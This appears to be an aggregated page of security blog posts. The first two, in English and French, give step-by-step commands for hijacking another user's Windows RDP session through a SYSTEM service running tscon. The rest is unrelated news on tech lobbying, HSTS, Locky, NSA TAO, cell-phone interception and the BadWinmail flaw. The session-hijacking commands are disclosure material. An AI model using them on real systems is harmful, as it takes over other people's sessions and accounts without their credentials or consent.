Session Hijacking All Windows versions

0-day or Feature? Privilege Escalation / Session Hijacking All Windows versions

* This post periodically updated, all updates in the end of the post.

Hey there,

Blogpost in 20 seconds: Fun with sethc backdoored host 🙂 somewhere in the internet:

Recently i’ve played with sethc/utilman logon screen backdoors, and almost everytime i used just command line.
Occasionally i’ve looked at Users tab in Task Manager (taskmgr.exe), and clicked connect button, and surprisingly i’ve got connected to selected user’s session.

When i checked it again with local admin rights, it failed by asking user’s password.
Why and how that happened? Let’s dig deeper.

Related to Microsoft documentation:
https://technet.microsoft.com/en-us/library/cc770988(v=ws.11).aspx
https://technet.microsoft.com/en-us/library/cc731007(v=ws.11).aspx

we can see couple important remarks:

Remarks

  • You must have Full Control access permission or Connect special access permission to connect to another session.
  • The /dest:<SessionName> parameter allows you to connect the session of another user to a different session.
  • If you do not specify a password in the <Password> parameter, and the target session belongs to a user other than the current one, tscon fails (not really).

I’ve got it! Sticky Keys (cmd backdoor) at windows login screen runs with NT AUTHORITY/SYSTEM and have Full Control access permission, and can connect to EVERY user session without asking for a password.

So we’ve got a session hijacking here. The most funny thing is that the legit user isn’t asked for logout, by using this technique the user just will be kicked out of the session without any notification.

Vulnerability Details.

A privileged user, which can gain command execution with NT AUTHORITY/SYSTEM rights can hijack any currently logged in user’s session, without any knowledge about his credentials.
Terminal Services session can be either in connected or disconnected state.

This is high risk vulnerability which allows any local admin to hijack a session and get access to:
1. Domain admin session.
2. Any unsaved documents, that hijacked user works on.
3. Any other systems/applications in which hijacked user previously logged in (May include another Remote Desktop sessions, Network Share mappings, applications which require another credentials, E-mail etc.)

Example scenario:

Some bank employee have access to billing system, and it’s credentials to login.
One day, he come to work, logging in to the billing system and start to work. At lunch time he will lock his workstation, and out to lunch.
Then, system administrator gets to employee’s workstation, and logs in with his administrator’s account.
According to the bank’s policy, administrator’s account should not have access to the billing system, but with couple of built-in commands in windows, this system administrator will hijack employee’s desktop which he leaved locked. From now, sysadmin can perform malicious actions in billing system as billing employee account.

There are huge amount of scenarios like this.

Furthermore, an attacker doesn’t need to use tools like metasploit, incognito, mimikatz etc, which is commonly used for user’s token manipulation and impersonating logged in users. Everything is done with built-in commands. Every admin can impersonate any logged in user either locally with physical access or remotely via Remote Desktops (see PoC).

Feature Vulnerability tested on:

Windows 2012 R2
Windows 2008
Windows 10
Windows 7

Proof of Concept:

Microsoft documentation helps us to do that from command line:
All we need is NT AUTHORITY/SYSTEM command line.
Easiest method with psexec, but requires psexec.exe to be there:
psexec -s \\localhost cmd
Another method is to create a service that will connect selected session to ours.
1. Get all sessions information:
C:\Windows\system32>query user
 USERNAME              SESSIONNAME        ID  STATE   IDLE TIME  LOGON TIME
 administrator                             1  Disc            1  3/12/2017 3:07 PM
>localadmin            rdp-tcp#55          2  Active          .  3/12/2017 3:10 PM

C:\Windows\system32>

2. Create service which will hijack user’s session:

C:\Windows\system32>sc create sesshijack binpath= "cmd.exe /k tscon 1 /dest:rdp-tcp#55"
[SC] CreateService SUCCESS
3. Start service:
net setart sesshijack
Right after that your session will be replaced with target session.

Proof of Concept video:

Windows 7 via Task Manager:

https://youtu.be/oPk5off3yUg

Windows 7 via command line:

https://youtu.be/VytjV2kPwSg

Windows 2012 R2 via service creation:

https://youtu.be/OgsoIoWmhWw

Update:  has found that before in 2011, so that is a feature and not zero-day: http://blog.gentilkiwi.com/securite/vol-de-session-rdp

Update: If you still think that this don’t have high attack value, read a great writeup by Kevin Beaumont about this feature:
https://medium.com/@networksecurity/rdp-hijacking-how-to-hijack-rds-and-remoteapp-sessions-transparently-to-move-through-an-da2a1e73a5f6

Update: RedSnarf has now support in RDP Hijacking https://www.youtube.com/watch?v=VrF8uXK_ePY

Vol de session RDP

Quand le systùme à tous les droits, rien ne vas plus


Vous ĂȘtes administrateur d’un serveur (ou vous en avez les droits ;)) et aimeriez rĂ©cupĂ©rer une session RDP dĂ©jĂ  ouverte, mal fermĂ©, ou simplement aller voir pourquoi Paintbrush est ouvert sur un serveur ?

rdp_paint

Plusieurs options nous sont ouvertes :

  • Se connecter en RDP sur le serveur et rĂ©cupĂ©rer la session Ă  l’écran d’accueil :logon_screen_pwd

    mais il faudra connaütre le mot de passe de session pour continuer


  • Se connecter en RDP avec son compte administrateur (puis tenter une connexion par le gestionnaire de tĂąches par exemple)taskmgr_pwd

    mais il faudra connaütre le mot de passe de session pour continuer
 (idem via tscon ou le gestionnaire des services Bureau à distance)

  • L’assistance Ă  distance : par dĂ©faut, ce n’est pas automatiqueaide_distance

    il fallait rĂ©gler ces options avant, et elles n’agiront pas sur les sessions courantes 🙁

Demandons un coup de main au systĂšme ?

Le systĂšme est notre ami

tscon_service

  1. Récupérons les identifiants de sessions concernés : query session
    C:\Windows\system32>query session
     SESSION           UTILISATEUR              ID  ÉTAT    TYPE        PÉRIPHÉRIQUE
     services                                    0  Déco
     console                                     1  Conn
    >rdp-tcp#1         user1                     2  Actif   rdpwd
     rdp-tcp#0         gentilkiwi                3  Actif   rdpwd
     rdp-tcp                                 65536  Écouter

    rdp-tcp#0 est la session que nous voulons voler, rdp-tcp#1 est notre session ouverte.

  2. CrĂ©ons rapidement un faux service (qui fera l’affaire) :
    sc create givemerdp binpath= "cmd /k tscon rdp-tcp#0 /dest:rdp-tcp#1" type= own
  3. En le dĂ©marrant, le bureau basculera 🙂
    sc start  givemerdp

    Il peut ĂȘtre supprimĂ© par :

    sc delete givemerdp

Cela peut bien sur ĂȘtre plus propre avec PsExec
 (et son argument -s)

Tests que je vous invite Ă  effectuer :

  • Travailler avec des sessions RDP sources inactives ou dont la session Windows n’est pas fermĂ©e
  • Travailler avec des sessions RDP cibles pas encore connectĂ©s !
  • Utiliser PsExec depuis une invite externe (sans RDP)

 

Source: http://blog.gentilkiwi.com/securite/vol-de-session-rdp

L’influence tentaculaire des gĂ©ants amĂ©ricains

Des relations documentées en Europe

Protection des donnĂ©es personnelles, rĂ©glementation des VTC, scĂ©narios fiscaux : les lĂ©gislations europĂ©ennes et françaises peuvent avoir des effets importants sur les gĂ©ants technologiques amĂ©ricains et leurs profits. Pour s’Ă©viter des dĂ©convenues budgĂ©taires ou prĂ©parer la lĂ©gislation Ă  leurs prochaines innovations, ces gĂ©ants investissent dans le lobbying. PrĂšs de 13 millions d’euros sont dĂ©pensĂ©s en lobbying par Google, Microsoft, Facebok, Apple, Amazon, Twitter et Uber chaque annĂ©e au niveau europĂ©en. Google et Microsoft sont ceux qui annoncent des budgets annuels consacrĂ©s aux activitĂ©s de lobbying en Europe les plus importants, avec des dĂ©penses entre 4,25 millions d’euros et 4,5 millions d’euros chaque annĂ©e.

Lobbying en Europe

Les rencontres des commissaires

Les commissaires europĂ©ens sont tenus de consigner toutes les rencontres qu’ils font avec les lobbyistes enregistrĂ©s auprĂšs du Parlement europĂ©en. Ces rencontres sont compilĂ©es par Transparency International. Elles permettent de voir comment et auprĂšs de qui les entreprises agissent. Avec Microsoft, Google est l’entreprise dont la prĂ©sence est la plus importante auprĂšs des institutions europĂ©ennes. Ce sont Ă©galement ses lobbyistes qui rencontrent le plus les commissaires europĂ©ens ou leur cabinet.

Notre compilation ne prend pas cependant pas en compte les associations auxquelles participent ces entreprises. Sorte de super-lobby, elles reprĂ©sentent les intĂ©rĂȘts de plusieurs entreprises et sont richement dotĂ©es. Il existe par exemple Digital Europe, qui reprĂ©sente les entreprises du numĂ©rique ou la CCIA (Computers & communication industry association), qui comptabilise 34 rencontres en son nom propre depuis 2014 avec des commissaires.

Google et Microsoft

40% des rencontres sont avec les commissaires responsables du marchĂ© unique numĂ©rique et de l’Ă©conomie numĂ©rique. Mais chez Google et Microsoft, on visite tout le monde. L’Ă©ducation, le travail, la recherche… Microsoft rencontre ainsi le cabinet du commissaire aux affaires intĂ©rieures pour discuter de « l’utilisation des nouvelles technologies en termes de sĂ©curitĂ© et de la crise migratoire ». L’entreprise n’a pas rĂ©pondu Ă  nos demandes de prĂ©cisions sur cette rencontre ou les nouvelles technologies qu’elle peut proposer dans ce contexte. Et les rencontres sont parfois plus rapprochĂ©es : une Ă©tude publiĂ©e en juin montrait que Google avait embauchĂ© prĂšs de 70 fonctionnaires europĂ©ens pour faire son lobbying.

Google a dramatiquement augmentĂ© le nombre de ses embauches « portes tambour » aprĂšs 2011, lorsque la Commission europĂ©enne a lancĂ© sa premiĂšre enquĂȘte antitrust contre l’entreprise. 18 de ses embauches ont Ă©tĂ© faites en 2011, soit plus du double de l’annĂ©e prĂ©cĂ©dente.

Un manque de transparence en France

Les lois concernant le lobbying sont quasiment inexistantes en France. Personne ne rĂ©pertorie les rencontres entre ceux qui Ă©crivent les lois et les lobbyistes. Parcellairement, nous avons reconstituĂ© quelques rencontres entre le pouvoir exĂ©cutif et les gĂ©ants amĂ©ricains. Depuis le dĂ©but du quinquennat, nous avons pu identifier 68 rencontres, dont un tiers sont entre Google et l’exĂ©cutif français. Les rencontres les plus mĂ©diatisĂ©es sont celles qui donnent une conclusion souriante Ă  des heures de lobbying : la signature d’un contrat entre le ministĂšre de l’Éducation nationale et Microsoft en 2015 ou l’accord entre Google et la presse française, signĂ© en grande pompe Ă  l’ÉlysĂ©e en fĂ©vrier 2013.

Lobbying en France

Portes tambour

Ce lobbying discret peut compter sur l’appui de certains serviteurs de l’État partis travailler pour Uber, Google ou Twitter : c’est ce qu’on appelle les portes tambour. Le dernier en date, annoncĂ© le 14 janvier, concerne BenoĂźt Loutrel, directeur gĂ©nĂ©ral de l’Arcep, le rĂ©gulateur des tĂ©lĂ©coms, qui rejoint l’Ă©quipe de lobbying de Google. Nous avons analysĂ© le parcours – principalement grĂące Ă  LinkedIn, propriĂ©tĂ© de Microsoft – d’une vingtaine de personnes passĂ©es du public Ă  ces entreprises. Ainsi, en 2015, Uber a recrutĂ© l’ancien conseiller en communication du secrĂ©taire d’État aux transports, quand Facebook peut compter sur un ancien conseiller de Nicolas Sarkozy Ă  l’ÉlysĂ©e.

Ces transferts ne sont presque pas encadrĂ©s et quasiment toujours acceptĂ©s. Un encadrement et une transparence sur les critĂšres permettraient de s’assurer que l’employĂ© ne tire pas profit de son temps dans le public. Les Ă©changes en « portes-tambour » peuvent encourager les Ă©changes de bons procĂ©dĂ©s entre les grandes entreprises et le secteur public.

Les liens de Microsoft

Depuis 2012, Microsoft a signé plusieurs des contrats et conventions.

Microsoft est la seule entreprise parmi celles Ă©tudiĂ©es Ă  avoir reçu des subventions au niveau europĂ©en et Ă  ĂȘtre bĂ©nĂ©ficiaire de marchĂ©s publics, pour un montant de 23 millions d’euros.

Des progrĂšs Ă  faire

Concernant les rencontres avec les dirigeants et les lobbyistes, Axelle Lemaire, secrĂ©taire d’État au numĂ©rique, publiait jusqu’Ă  la moitiĂ© de l’annĂ©e 2016 son agenda en ligne dans un format lisible. Cette bonne habitude, qui permettait de facilement suivre son travail s’est hĂ©las arrĂȘtĂ©e. Elle se contente aujourd’hui du format PDF inexploitable. Il a fallu Ă©plucher de nombreux pdf d’agenda, pas forcĂ©ment tous conservĂ©s, pour retrouver l’agenda de chaque ministre depuis le dĂ©but du quinquennat. Quant aux parlementaires, rien ne permet de suivre leurs rendez-vous. La loi Sapin 2, relative Ă  la transparence et Ă  la lutte contre la corruption, votĂ©e Ă  l’Ă©tĂ© 2016 ne prĂ©voit qu’un registre des lobbyistes. Des modalitĂ©s bien pauvres, si l’on compare avec les Etats-Unis et le Canada. Cette transparence permettrait pourtant de comprendre plus facilement les intĂ©rĂȘts de chacun dans les lĂ©gislations en discussion.

source: https://github.com/alphoenix/donnees/tree/master/lobbies-gafamut#des-relations-documentées-en-europe

La plupart des serrures connectĂ©es peuvent ĂȘtre hackĂ©es

La plupart des serrures connectĂ©es peuvent ĂȘtre hackĂ©es

Il est facile de déverrouiller ces dispositifs en interceptant leurs communications Bluetooth avec les smartphones des utilisateurs.

Source: http://www.01net.com/actualites/la-plupart-des-serrures-connectees-peuvent-etre-hackees-1024468.html

Google donne le coup d’envoi à HSTS sur ses serveurs

HSTS pour tous ! Ou tout du moins pour Google.com. Le moteur de recherche annonce en effet avoir franchi une nouvelle Ă©tape dans la sĂ©curisation de ses services web en dĂ©ployant la politique de sĂ©curitĂ© HSTS sur son nom de domaine. Celle-ci est officiellement activĂ© selon un post de blog rĂ©digĂ© par Jay Brown, membre de l’équipe sĂ©curitĂ© de Google.

HSTS est une politique de sĂ©curitĂ© qui vise Ă  corriger certains dĂ©fauts dĂ©celĂ©s au sein de HTTPS. Ainsi, HSTS permet de rediriger automatiquement l’utilisateur vers la version HTTPS du site linkĂ©, quelle que soit la forme du lien affichĂ© par la page. HSTS permet aussi de s’assurer que le navigateur de l’internaute prend bien en compte les derniĂšres suites de chiffrement et que l’échange de donnĂ©es entre le site et l’utilisateur n’est pas dĂ©gradĂ© Ă  une version de l’algorithme de chiffrement considĂ©rĂ©e comme obsolĂšte.

Pour les utilisateurs, le changement devrait ĂȘtre transparent pour peu qu’ils utilisent une version de navigateur relativement rĂ©cente. Google explique avoir eu besoin d’un peu de temps pour mettre en place cette politique Ă  cause de certains services parfois anciens ou peu utilisĂ©s : Jay Brown cite ainsi le service Santa Tracker, qui permet de suivre la tournĂ©e du pĂšre NoĂ«l, que le passage au HSTS avait momentanĂ©ment rendu indisponible peu de temps avant NoĂ«l.

Mais ces diffĂ©rents soucis ont Ă©tĂ© rĂ©glĂ©s selon Google, ce qui signifie que l’ensemble de ses services et sites web liĂ© au nom de domaine Google.com dispose aujourd’hui de HSTS.

Source: http://www.zdnet.fr/actualites/google-donne-le-coup-d-envoi-a-hsts-sur-ses-serveurs-39840336.htm

Google vous espionne-t-il vraiment ?

Un article a rĂ©cemment insinuĂ© que Google espionne secrĂštement vos conversations et discussions. Bien qu’il soit fondĂ©, on ne sait pas si c’est vrai.

google-listening-featured

Google enregistre des voix ; il n’y a pas de doute lĂ -dessus. Toutefois, il le fait uniquement pour la reconnaissance vocale – tout comme Apple. Tous deux enregistrent l’historique de recherche vocale afin d’aider leurs applis (autrement dit Google et Siri) Ă  mieux comprendre les voix. Un autre Ă©lĂ©ment Ă  prendre en compte est que Google enregistre uniquement via les dispositifs Android, et non sur Apple (mĂȘme si vous avez installĂ© l’application de Google sur votre iPhone).

D’un autre cĂŽtĂ©, Google opĂšre dans le monde entier, exceptĂ© dans quelques pays, et il n’est pas difficile de s’imaginer qu’une telle chose puisse ĂȘtre utilisĂ©e Ă  mauvais escient. De plus, vous devez vous demander : Pourquoi Google garde-t-il les enregistrements ? Utiliser vos enregistrements vocaux temporairement afin de comprendre votre requĂȘte de recherche est comprĂ©hensible, en revanche pourquoi les conserver ?

google-search-history-settings

En résumé, Google conserve votre historique de recherche, tous vos e-mails, vos documents de bureau, vos données de localisation, vos photos et que sais-je encore. Pourquoi donc les enregistrements vocaux échapperaient-ils à la rÚgle ? La vraie question à se poser ici est : à quoi lui servent toutes ces données ?

A long terme, Google alimente sa gĂ©ante plateforme Cloud de donnĂ©es afin d’aider Ă  dĂ©velopper les outils de recherche de l’entreprise. A court terme, elles sont utilisĂ©es pour rendre vos rĂ©sultats de recherche plus pertinents et les publicitĂ©s plus optimales. Au cas oĂč vous ne le sauriez pas, Google gĂ©nĂšre ses 20 milliards de dollars trimestriels presque uniquement grĂące Ă  la publicitĂ©.

Cette publicité en question est la raison pour laquelle Google vous offre toutes ces applications incroyables et services « gratuitement ». Vous payez avec vos données, et consommez avec les publicités.

Une chose encore plus inquiĂ©tante Ă  prendre en compte est que si quelqu’un pirate votre compte, il en apprendra Ă©normĂ©ment sur vous.

Dans ce cas heureusement, la sauvegarde des donnĂ©es est facultative (pour l’instant), mais est toutefois activĂ©e par dĂ©faut. Si vous ne voulez pas faire partie de cet approvisionnement et de ce stockage de donnĂ©es pour le marchĂ© des affaires, la meilleure chose Ă  faire est de refuser et dĂ©sactiver (« interrompre ») quoi que ce soit dans les paramĂštres de suivi de Google.

google-search-history-settings

First seen on : https://blog.kaspersky.fr/google-listening/5731/

Locky – La solution pour s’en protĂ©ger

First seen on: http://korben.info/locky-solution-sen-proteger.html

La plus rapide Ă©tant de passer tout son OS en Russe pour le vacciner, je vais plutĂŽt vous rĂ©sumer la seconde solution, Ă  la fois rapide et pratique quand on ne parle pas un mot de Poutinien. Attention, elle sera efficace uniquement avec les versions actuelles de Locky. Rien ne garantit qu’une version ultĂ©rieure de Locky ne contournera pas le souci.

Comme Locky essaye de crĂ©er la clĂ© HKCU\Software\Locky dans la base de registre (regedit), il suffit de la crĂ©er avant lui…

Capture d’écran 2016-03-23 Ă  15.37.19

et de refuser tous les droits d’accĂšs sur celle-ci:

Capture d’écran 2016-03-23 Ă  15.38.22

Et voilà ! Ainsi, en se lançant sur votre systÚme, Locky se crashera comme une station Mir dans le jardin de Paco. Les autres solutions proposées par Lexsi sont un poil plus complexes, mais vraiment intéressantes. Je vous invite à les lire, ne serait-ce que pour votre culture personnelle.

Merci Ă  Olivier pour le partage.

Quand le chef des hackers de la NSA explique son travail

VoilĂ  un rendez-vous qu’il ne fallait pas rater. Rob Joyce, le responsable des hackers de la NSA, des « pirates » connus sous le nom de Tailored Access Operations, a expliquĂ© comment les entreprises pouvaient se protĂ©ger de ses « ninjas » !

Le Tailored Access Operations, c’est le service top secret de la NSA. Le TAO regroupe les informaticiens hackers de la National Security Agency. La mission du TAO, infiltrer et mettre la main sur des informations dont l’agence et l’Oncle Sam auraient besoin. Rob Joyce, le patron de cette section numĂ©rique de la NSA est venu expliquer le travail de son Ă©quipe lors de l’Enigma confĂ©rence. Étonnante rencontre alors que durant des annĂ©es la NSA a toujours dĂ©menti agir Ă  la sauce cyber attaque.

Plus Ă©tonnant encore, Rob Joyce a indiquĂ© comment les entreprises pouvaient se protĂ©ger des actions de ses hommes. Bon, bien Ă©videment, il a racontĂ© ce qu’il pouvait/voulait dire, mais la dĂ©marche a le mĂ©rite d’ouvrir les sens. « Beaucoup de gens pensent que les États-Unis utilisent beaucoup de 0Day. Nous n’en possĂ©dons pas tant que ça et il n’est pas commun que nous les utilisions« . L’homme de l’ombre indique que l’ingĂ©niositĂ© et les essais suffisent « Nous essayons, nous attendons, puis essayons encore et attendons jusqu’à ce que nous trouvions la vulnĂ©rabilitĂ©. » Un dĂ©tail amusant dans la confĂ©rence du Big boss du TAO, le fait que ses hommes, la plupart du temps, connaissent mieux le rĂ©seau et les installations que les informations de la cible de la NSA « Souvent, nous connaissons mieux les rĂ©seaux que ceux qui les ont conçus et les font fonctionner« . Les hackers de la NSA exploitent huit phases dans leurs actions : dĂ©couvrir, premiĂšre pĂ©nĂ©tration, assurer leur prĂ©sence, installer un outil logiciel, Ă©tendre la prĂ©sence, recueillir, exfiltrer et exploiter les donnĂ©es. L’agence spĂ©cial a indiquĂ© que les entreprises doivent impĂ©rativement mettre Ă  jour leurs logiciels et se mĂ©fier du cloud !

Source: http://www.datasecuritybreach.fr/quand-le-chef-des-hackers-de-la-nsa-explique-son-travail/

Dans la ville de Green Bank, avoir le Wifi ou mĂȘme un smartphone est illĂ©gal !

Green Bank est une petite ville amĂ©ricaine situĂ©e en West Virginia dans la fameuse National Radio Quiet Zone. Dans cette ville de 130 habitants, il est interdit d’avoir le Wifi, du Bluetooth, un simple tĂ©lĂ©phone sans fil ou encore un four Ă  micro-ondes, un portail tĂ©lĂ©commandĂ©, etc. !

tdy_sanders_phones_160129_4ce95aa9946e60bda6c3ec28cbe985d7.today-inline-large

Mais il y a heureusement une raison Ă  ça. En effet, Ă  Green Bank, on trouve la National Radio Astronomy Observatory qui dispose du plus grand radiotĂ©lescope au monde, et qui Ă©tudie notamment les Ă©missions des ondes radio qui viennent des corps dans l’espace, selon Michael Holstine, directeur commercial de l’observatoire. Pour ne pas avoir une seule interfĂ©rence, le black out est donc total et la ville a mĂȘme un camion de surveillance qui agit comme une « police de la radio » pour surveiller les ondes Ă©mises.

Police Using Planes Equipped with Dirtbox to Spy on your Cell Phones

California Police Using Planes Equipped with Dirtbox to Spy on your Cell Phones

The Anaheim Police Department of California — Home of Disneyland — admitted that they used special Cell Phone surveillance technology, known as DirtBox, mounted on aircraft to track millions of mobile users activities.

More than 400 pages of new documents [PDF] published Wednesday revealed that Local Police and federal authorities are using, DRTBox, an advanced version of Dirtbox developed by Digital Receiver Technology (Boeing’s Maryland-based subsidiary).

DRTBox — Spies in the Sky

DRTBox is a military surveillance technology that has capabilities of both Stingray as well as Dirtbox, allowing the police to track, intercept thousands of cellphone calls and quietly eavesdrop on conversations, emails, and text messages.
According to the report, DRTBox model is also capable of simultaneously breaking the encryption hundreds of cellphone communications at once, helping Anaheim Police Department track criminals while recording innocent citizens’ information.

“This cell phone spying program – which potentially affects the privacy of everyone from Orange County’s 3 million residents to the 16 million people who visit Disneyland every year – shows the dangers of allowing law enforcement to secretly acquire surveillance technology,” said Matt Cagle, technology and civil liberties policy attorney for ACLU-NC.

Besides Dirtbox, the police also purchased multiple Stingray devices, including one that can monitor LTE (Long Term Evolution) networks.

How does DRTBox Work?

dirtbox
DRTBox is capable of retrieving data from tens of thousands of mobile phones during a single flight in order to target criminals and suspects. However, the data on a vast number of innocent people are also being collected.

“Our products are lightweight, low power, small, and are supportable on multiple platforms. Our products are featured in UAVs, planes, helicopters, vehicles, towers, and on walk-tests, submarines, and boats.” DRT website claims.

Generally, DRTBox works by masquerading as a cell phone tower. All the mobile phones, within the range that automatically connect to the strongest and nearest cell tower, respond to this signal and trick victims into connecting to it.
DRTBox also collects Hardware Numbers (registration information and identity data) associated with the phone – uniquely identifying IMEI numbers stored in every mobile device.

DRTBox surveillance device runs a Man In the Middle (MITM) attack that could not be detected by the users easily and thus, allows Police to track and catch criminals like drug-traffickers.

As it targets all nearby cellular devices, so Law Enforcements are able to get information from hundreds of devices concurrently.

How does DRTbox Crack Carrier-based Encryption?

Wireless Carriers are using various encryption standards to protect the privacy of cellphone data communication, which is built into GSM 2G, 3G, 4G and LTE networks.

Since GSM is nearly 30 years old and deprecated over the time because of…

  • lack of tower authentication,
  • bad key derivation algorithms
  • and terrible encryption algorithms,

…it is easily crackable.

However, 3G, 4G and LTE networks have fixed these vulnerabilities and are using strong encryption standards to keep communication between the handset and the local tower secure.
If you are using 3G/4G SIM, then you must be aware that in case of network unavailability, your 3G/4G connections automatically drop down (failover or fallback) to GSM connection.
DRTbox exploits this fallback feature to implement a rollback attack — jamming 3G/4G connection and thus re-activating all of the GSM attacks to crack encryption easily in order to intercept calls and other data that would have been harder to break, particularly in bulk.
The Government can then figure out who, when and to where a target is calling from, the precise location of every device within the range and even capture the content of the communication.

In this way, the federal agencies and local police can safely engage in passive, bulk surveillance without having original decryption keys and without leaving any trace whatsoever.

How to Protect yourself from DRTbox or Stingrays

Don’t confuse carrier-based encryption with application-level encryptions (end-to-end encryption), both are different.

So, if you are concerned about police snooping on your communication, the best option is…

…use software to encrypt your emails (PGP), instant messages (Telegram or Signal), documents and even your voice calls (RedPhone).

Besides this, you can also enable 3G/4G/LTE-only mode from device settings to forcefully limit your smartphone to use only secure connection.

This would prevent DRTBox or any cell phone tracking device to intercept your data communication, but might allow location tracking.

Warrantless Surveillance

Last year, the Department of Justice that oversees the FBI as well as the Department of Homeland Security announced a policy that required the Federal Investigation of Bureau and other federal authorities to obtain a court authorization or warrant before deploying these tracking devices.
Moreover, some individual states, including California, also passed a law that requires a warrant for the use of Stingrays and similar tracking devices.
Still, these spying devices continue to be used without the knowledge of citizens.
According to the documents, the police force lent its technology to police departments all over Orange County, thus, it impacted not only local residents but also 3 Million people live in Orange County and 16 Million people visiting Disneyland every year.

Comment votre PC peut ĂȘtre infectĂ© par un seul e-mail non lu ?

Comment votre PC peut ĂȘtre infectĂ© par un seul e-mail non lu ?

Nous vous le rĂ©pĂ©tons sans cesse : ne cliquez jamais sur des liens suspicieux, n’ouvrez jamais de fichiers de sources inconnues et effacez toujours les e-mails d’expĂ©diteurs que vous ne con-naissez pas. MĂȘme si tous ces conseils sont bons, ils ne vous serviront Ă  rien si vous utilisez Outlook, car ils ne vous protĂ©geront pas de la vulnĂ©rabilitĂ© BadWinmail. Vous n’avez pas besoin de cliquer ou d’ouvrir quelque chose d’infectĂ©. Vous recevez un e-mail
 et c’est tout. En fait, il n’est mĂȘme pas nĂ©cessaire d’ouvrir le mail.

badwinmail-featured

Comment est-ce possible ?

Si vous connaissez Microsoft Office, vous savez probablement que des objets peuvent ĂȘtre in-tĂ©grĂ©s Ă  des fichiers MS Office. Bien sĂ»r, ce n’est pas le cas de n’importe quel objet, mais la liste est assez longue. Cela s’appelle la technologie OLE (Object Linking and Embedding, incrustation et connexion d’objet).

En fait, cette technologie fonctionne non seulement sur DOC, XLS et cetera, mais aussi sur Ou-tlook. Et la liste des objets mentionnés ci-dessous contient, en plus de formats MS Office géné-riques, des choses sympas comme les projets Adobe Flash.

Savez-vous pourquoi les cybercriminels adorent tellement Flash ? Parce que Flash comporte beaucoup de vulnĂ©rabilitĂ©s. Certains de ces bogues jour zĂ©ro, ce qui signi-fie qu’ils ne sont pas corrigĂ©s. Ces vulnĂ©rabilitĂ©s peuvent ĂȘtre exploitĂ©s pour faire des choses que votre PC n’apprĂ©ciera certainement pas.

C’est un problĂšme trĂšs connu et, pour lutter contre celui-ci, de nombreux dĂ©veloppeurs utilisent la mĂȘme mĂ©thode simple : ils n’autorisent le continu Flash Ă  fonctionner dans leurs logiciels (par exemple les navigateurs) que dans ce qu’on appelle des  » bacs Ă  sable « . Le code malveillant peut faire ce qu’il veut dans ces bacs Ă  sable, mĂȘme lancer une cyberapocalypse !

L’idĂ©e c’est qu’il ne puisse pas s’échapper du bac Ă  sable et ne puisse donc rien affecter hors de celui-ci pour que vos fichiers ne soient pas corrompus. Cette mĂ©thode est tout du moins conçue ainsi ; parfois, le truc ne marche pas, mais c’est encore une autre histoire. Le cas qui nous occupe n’a rien Ă  voir avec cela.

Vous attendez la suite pour comprendre quelle est la vulnĂ©rabilitĂ© d’Outlook ? C’est parti ! En fait, Outlook n’utilise pas ce type de bacs Ă  sable pour les objets potentiellement dangereux et exĂ©cute tout en mode normal. Cela signifie que le code malveillant des objets intĂ©grĂ©s peut agir comme n’importe quel autre logiciel installĂ© sur votre PC.

Et il n’y a pas que cela ! Outlook est si obligeant qu’il ouvre l’e-mail le plus rĂ©cent avant que vous ne le fassiez ! Ainsi, si un e-mail malveillant avec un programme BadWinmail est le dernier e-mail Ă  ĂȘtre arrivĂ© dans votre boĂźte de rĂ©ception, il est exĂ©cutĂ© immĂ©diatement lorsque vous dĂ©marrez Outlook.

Le chercheur en sĂ©curitĂ© Haifei Li, qui a dĂ©couvert le bug, a crĂ©Ă© des preuves du concept d’une attaque possible qui exploiterait la vulnĂ©rabilitĂ© BadWinmail, comme il l’a appelĂ©e. Il le dĂ©crit avec des mots Ă©tonnamment simples dans sa recherche.

Il a mĂȘme crĂ©Ă© cette vidĂ©o relativement courte qui explique parfaitement l’idĂ©e centrale du fonc-tionnement de cette vulnĂ©rabilitĂ©.

Pour comprendre Ă  quel point cela peut ĂȘtre nocif, imaginez qu’un criminel, au lieu d’ouvrir l’innocente application de Calculatrice, exĂ©cute un ransomware sur votre PC.

La bonne nouvelle, c’est que Haifei Li a signalĂ© ce bug Ă  Microsoft, et que la sociĂ©tĂ© a rĂ©solu ce problĂšme le 8 dĂ©cembre. La mauvaise, c’est que les personnes qui n’ont pas l’habitude de mettre Ă  jour leur logiciel rĂ©guliĂšrement ont encore cette vulnĂ©rabilitĂ©. Et certains d’entre eux la garderont pendant des semaines, des mois ou mĂȘme des annĂ©es.

Maintenant que le rapport a Ă©tĂ© publiĂ© pour le grand public, de nombreux cybercriminels vont essayer d’utiliser cette vulnĂ©rabilitĂ© pour infecter des milliers, voir des millions de PC. Si vous vous ĂȘtes un jour demandĂ© pourquoi il est si important de toujours mettre vos logiciels Ă  jour immĂ©diatement et d’utiliser un logiciel de sĂ©curitĂ©, je crois que vous avez dĂ©-sormais la rĂ©ponse Ă  cette question.

Source: https://blog.kaspersky.fr/badwinmail/5087/

L’arsenal utilisĂ© par Daesh pour rester sous le radar

sécurité police hacker hacking hack

TĂ©lĂ©phonie chiffrĂ©e, chat sĂ©curisé  Les terroristes utilisent les mĂȘmes outils que les cybercriminels et paradoxalement… que les dĂ©fenseurs des libertĂ©s. Ils disposent mĂȘme d’un service de support 24 x 7.